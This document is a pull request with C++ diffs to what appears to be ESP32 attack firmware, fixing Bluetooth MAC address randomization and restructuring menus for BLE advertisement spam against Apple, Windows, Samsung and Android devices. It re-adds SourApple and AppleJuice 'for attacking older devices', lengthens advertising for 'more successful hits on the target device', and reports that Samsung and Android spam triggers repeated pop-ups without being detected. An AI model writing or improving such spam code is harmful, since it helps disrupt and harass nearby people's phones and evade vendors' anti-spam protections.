### PR TITLE
BLE Spam MAC randomization fix

### DIFF
--- a/src/core/menu_items/BleMenu.cpp
+++ b/src/core/menu_items/BleMenu.cpp
@@ -32,7 +32,7 @@ void BleMenu::optionsMenu() {
     options.push_back({"Bad BLE", [=]() { ducky_setup(hid_ble, true); }});
 #endif
     options.push_back({"BLE Keyboard", [=]() { ducky_keyboard(hid_ble, true); }});
-    options.push_back({"Apple", [=]() { appleSubMenu(); }});
+    options.push_back({"Apple Spam", [=]() { appleSubMenu(); }});
     options.push_back({"Windows Spam", lambdaHelper(aj_adv, 2)});
     options.push_back({"Samsung Spam", lambdaHelper(aj_adv, 3)});
     options.push_back({"Android Spam", lambdaHelper(aj_adv, 4)});

--- a/src/core/menu_items/BleMenu.cpp
+++ b/src/core/menu_items/BleMenu.cpp
@@ -32,12 +32,7 @@ void BleMenu::optionsMenu() {
     options.push_back({"Bad BLE", [=]() { ducky_setup(hid_ble, true); }});
 #endif
     options.push_back({"BLE Keyboard", [=]() { ducky_keyboard(hid_ble, true); }});
-    options.push_back({"Apple Spam", [=]() { appleSubMenu(); }});
-    options.push_back({"Windows Spam", lambdaHelper(aj_adv, 2)});
-    options.push_back({"Samsung Spam", lambdaHelper(aj_adv, 3)});
-    options.push_back({"Android Spam", lambdaHelper(aj_adv, 4)});
-    options.push_back({"Spam All", lambdaHelper(aj_adv, 5)});
-    options.push_back({"Spam Custom", lambdaHelper(aj_adv, 6)});
+    options.push_back({"BLE Spam", [=]() { spamMenu(); }});
 #if !defined(LITE_VERSION)
     options.push_back({"Ninebot", [=]() { BLENinebot(); }});
 #endif

--- a/src/modules/ble/apple_spam.cpp
+++ b/src/modules/ble/apple_spam.cpp
@@ -243,17 +243,6 @@ void startAppleSpam(int payloadIndex) {
 }
 
 
-void legacySubMenu() {
-    std::vector<Option> legacyOptions;
-    
-    legacyOptions.push_back({"SourApple", []() { aj_adv(7); }});
-    legacyOptions.push_back({"AppleJuice", []() { aj_adv(8); }});
-    
-    
-    legacyOptions.push_back({"Back", []() { returnToMenu = true; }});
-    
-    loopOptions(legacyOptions, MENU_TYPE_SUBMENU, "Legacy Apple Spam");
-}
 
 void appleSubMenu() {
     std::vector<Option> appleOptions;
@@ -267,10 +256,6 @@ void appleSubMenu() {
             startAppleSpam(i);
         }});
     }
-    
-    appleOptions.push_back({"Legacy", []() {
-        legacySubMenu();
-    }});
 
     appleOptions.push_back({"Back", []() {
         returnToMenu = true;

--- a/src/modules/ble/apple_spam.cpp
+++ b/src/modules/ble/apple_spam.cpp
@@ -1,4 +1,5 @@
 #include "apple_spam.h"
+#include "ble_spam.h"
 #include "core/display.h"
 #include "core/mykeyboard.h"
 #include "core/utils.h"
@@ -241,6 +242,19 @@ void startAppleSpam(int payloadIndex) {
     }
 }
 
+
+void legacySubMenu() {
+    std::vector<Option> legacyOptions;
+    
+    legacyOptions.push_back({"SourApple", []() { aj_adv(7); }});
+    legacyOptions.push_back({"AppleJuice", []() { aj_adv(8); }});
+    
+    
+    legacyOptions.push_back({"Back", []() { returnToMenu = true; }});
+    
+    loopOptions(legacyOptions, MENU_TYPE_SUBMENU, "Legacy Apple Spam");
+}
+
 void appleSubMenu() {
     std::vector<Option> appleOptions;
     
@@ -254,6 +268,10 @@ void appleSubMenu() {
         }});
     }
     
+    appleOptions.push_back({"Legacy", []() {
+        legacySubMenu();
+    }});
+
     appleOptions.push_back({"Back", []() {
         returnToMenu = true;
     }});

--- a/src/modules/ble/ble_spam.cpp
+++ b/src/modules/ble/ble_spam.cpp
@@ -462,10 +462,22 @@ void aj_adv(int ble_choice) {
 #endif
 }
 
+void legacySubMenu() {
+    std::vector<Option> legacyOptions;
+    
+    legacyOptions.push_back({"SourApple", []() { aj_adv(7); }});
+    legacyOptions.push_back({"AppleJuice", []() { aj_adv(8); }});
+    
+    
+    legacyOptions.push_back({"Back", []() { returnToMenu = true; }});
+    
+    loopOptions(legacyOptions, MENU_TYPE_SUBMENU, "Apple Spam (Legacy)");
+}
 void spamMenu() {
     std::vector<Option> options;
 
     options.push_back({"Apple Spam", [=]() { appleSubMenu(); }});
+    options.push_back({"Apple Spam (Legacy)", [=]() { legacySubMenu(); }});
     options.push_back({"Windows Spam", lambdaHelper(aj_adv, 2)});
     options.push_back({"Samsung Spam", lambdaHelper(aj_adv, 3)});
     options.push_back({"Android Spam", lambdaHelper(aj_adv, 4)});

--- a/src/modules/ble/ble_spam.cpp
+++ b/src/modules/ble/ble_spam.cpp
@@ -243,8 +243,9 @@ void executeSpam(EBLEPayloadType type) {
     
     uint8_t macAddr[6];
     generateRandomMac(macAddr);
-    esp_base_mac_addr_set(macAddr);
+    esp_iface_mac_addr_set(macAddr, ESP_MAC_BT);
 
+    vTaskDelay(10 / portTICK_PERIOD_MS);
     BLEDevice::init("");
     vTaskDelay(5 / portTICK_PERIOD_MS);
     esp_ble_tx_power_set(ESP_BLE_PWR_TYPE_ADV, MAX_TX_POWER);
@@ -259,7 +260,7 @@ void executeSpam(EBLEPayloadType type) {
     pAdvertising->setMinInterval(32);
     pAdvertising->setMaxInterval(48);
     pAdvertising->start();
-    vTaskDelay(100 / portTICK_PERIOD_MS);
+    vTaskDelay(50 / portTICK_PERIOD_MS);
 
     pAdvertising->stop();
     vTaskDelay(5 / portTICK_PERIOD_MS);
@@ -268,13 +269,14 @@ void executeSpam(EBLEPayloadType type) {
 #else
     BLEDevice::deinit();
 #endif
+    vTaskDelay(10 / portTICK_PERIOD_MS);
 }
 
 void executeCustomSpam(String spamName) {
     uint8_t macAddr[6];
     for (int i = 0; i < 6; i++) { macAddr[i] = esp_random() & 0xFF; }
     macAddr[0] = (macAddr[0] | 0xF0) & 0xFE;
-    esp_base_mac_addr_set(macAddr);
+    esp_iface_mac_addr_set(macAddr, ESP_MAC_BT);
 
     BLEDevice::init("sh4rk");
 
@@ -304,7 +306,7 @@ void executeCustomSpam(String spamName) {
 void ibeacon(const char *DeviceName, const char *BEACON_UUID, int ManufacturerId) {
     uint8_t macAddr[6];
     generateRandomMac(macAddr);
-    esp_base_mac_addr_set(macAddr);
+    esp_iface_mac_addr_set(macAddr, ESP_MAC_BT);
 
     BLEDevice::init(DeviceName);
     vTaskDelay(5 / portTICK_PERIOD_MS);

--- a/src/modules/ble/ble_spam.cpp
+++ b/src/modules/ble/ble_spam.cpp
@@ -245,7 +245,6 @@ void executeSpam(EBLEPayloadType type) {
     generateRandomMac(macAddr);
     esp_iface_mac_addr_set(macAddr, ESP_MAC_BT);
 
-    vTaskDelay(10 / portTICK_PERIOD_MS);
     BLEDevice::init("");
     vTaskDelay(5 / portTICK_PERIOD_MS);
     esp_ble_tx_power_set(ESP_BLE_PWR_TYPE_ADV, MAX_TX_POWER);
@@ -269,7 +268,6 @@ void executeSpam(EBLEPayloadType type) {
 #else
     BLEDevice::deinit();
 #endif
-    vTaskDelay(10 / portTICK_PERIOD_MS);
 }
 
 void executeCustomSpam(String spamName) {

--- a/src/modules/ble/ble_spam.cpp
+++ b/src/modules/ble/ble_spam.cpp
@@ -237,16 +237,13 @@ BLEAdvertisementData GetUniversalAdvertisementData(EBLEPayloadType Type) {
 }
 
 void executeSpam(EBLEPayloadType type) {
-    if (type == AppleJuice || type == SourApple) {
-        return;
-    }
     
     uint8_t macAddr[6];
     generateRandomMac(macAddr);
     esp_iface_mac_addr_set(macAddr, ESP_MAC_BT);
 
     BLEDevice::init("");
-    vTaskDelay(5 / portTICK_PERIOD_MS);
+    vTaskDelay(50 / portTICK_PERIOD_MS);
     esp_ble_tx_power_set(ESP_BLE_PWR_TYPE_ADV, MAX_TX_POWER);
     pAdvertising = BLEDevice::getAdvertising();
     BLEAdvertisementData advertisementData = GetUniversalAdvertisementData(type);
@@ -259,10 +256,10 @@ void executeSpam(EBLEPayloadType type) {
     pAdvertising->setMinInterval(32);
     pAdvertising->setMaxInterval(48);
     pAdvertising->start();
-    vTaskDelay(50 / portTICK_PERIOD_MS);
+    vTaskDelay(250 / portTICK_PERIOD_MS);
 
     pAdvertising->stop();
-    vTaskDelay(5 / portTICK_PERIOD_MS);
+    vTaskDelay(50 / portTICK_PERIOD_MS);
 #if defined(CONFIG_IDF_TARGET_ESP32C5)
     esp_bt_controller_deinit();
 #else
@@ -437,6 +434,15 @@ void aj_adv(int ble_choice) {
             case 6:
                 displayTextLine("Spamming " + spamName + "(" + String(count) + ")");
                 executeCustomSpam(spamName);
+                break;
+            case 7:
+                displayTextLine("SourApple " + String(count));
+                executeSpam(SourApple);
+                break;
+            case 8:
+                displayTextLine("AppleJuice " + String(count));
+                executeSpam(AppleJuice);
+                break;
         }
         count++;
 
@@ -445,7 +451,6 @@ void aj_adv(int ble_choice) {
             break;
         }
     }
-
     BLEDevice::init("");
     vTaskDelay(100 / portTICK_PERIOD_MS);
     pAdvertising = nullptr;
@@ -455,4 +460,18 @@ void aj_adv(int ble_choice) {
 #else
     BLEDevice::deinit();
 #endif
+}
+
+void spamMenu() {
+    std::vector<Option> options;
+
+    options.push_back({"Apple Spam", [=]() { appleSubMenu(); }});
+    options.push_back({"Windows Spam", lambdaHelper(aj_adv, 2)});
+    options.push_back({"Samsung Spam", lambdaHelper(aj_adv, 3)});
+    options.push_back({"Android Spam", lambdaHelper(aj_adv, 4)});
+    options.push_back({"Spam All", lambdaHelper(aj_adv, 5)});
+    options.push_back({"Spam Custom", lambdaHelper(aj_adv, 6)});
+    options.push_back({"Back", []() { returnToMenu = true; }});
+     
+    loopOptions(options, MENU_TYPE_SUBMENU, "Bluetooth Spam");
 }

--- a/src/modules/ble/ble_spam.h
+++ b/src/modules/ble/ble_spam.h
@@ -6,6 +6,8 @@
 #include <NimBLEServer.h>
 #include <NimBLEUtils.h>
 void aj_adv(int ble_choice);
+void spamMenu();
+
 void ibeacon(
     const char *DeviceName = "Bruce iBeacon", const char *BEACON_UUID = "8ec76ea3-6668-48da-9866-75be8bc86f4d",
     int ManufacturerId = 0x4C00


### PR DESCRIPTION
#### Proposed Changes ####
- Fixing MAC address randomization for Bluetooth spam. 
- Renamed Apple to Apple Spam.
- Put all spam options under BLE Spam in the Bluetooth menu.
- Added Apple Spam (Legacy) submenu to BLE Spam that includes SourApple and AppleJuice for attacking older devices.
- Lengthened advertisement length to make spamming more effective.
#### Types of Changes ####
Bugfixes, menu restructuring.

#### Verification ####
Running the BLE spam functions.

#### Testing ####
There are no unit tests

#### Linked Issues ####
https://github.com/BruceDevices/firmware/issues/1976

#### User-Facing Change ####
Renamed the section "Apple" to "Apple Spam" to fit with the other menu options. Put "Apple Spam", "Apple Spam (Legacy)", "Windows Spam", "Samsung Spam", "Android Spam", "Spam All", and "Spam Custom" under the menu "BLE Spam". "Apple Spam (Legacy)" contains "AppleJuice" and "SourApple".

#### Further Comments ####
The root of the issue is that `esp_base_mac_addr_set` was used instead of the correct function: `esp_iface_mac_addr_set`.

I updated the usage in the BLE spam file, as well as increased the advertisement length to achieve more successful hits on the target device.

The Samsung and Android spam work to repeatedly initiate pop-ups without being detected as spam. While MAC randomization is fixed, Apple still has effective anti-spam measures.


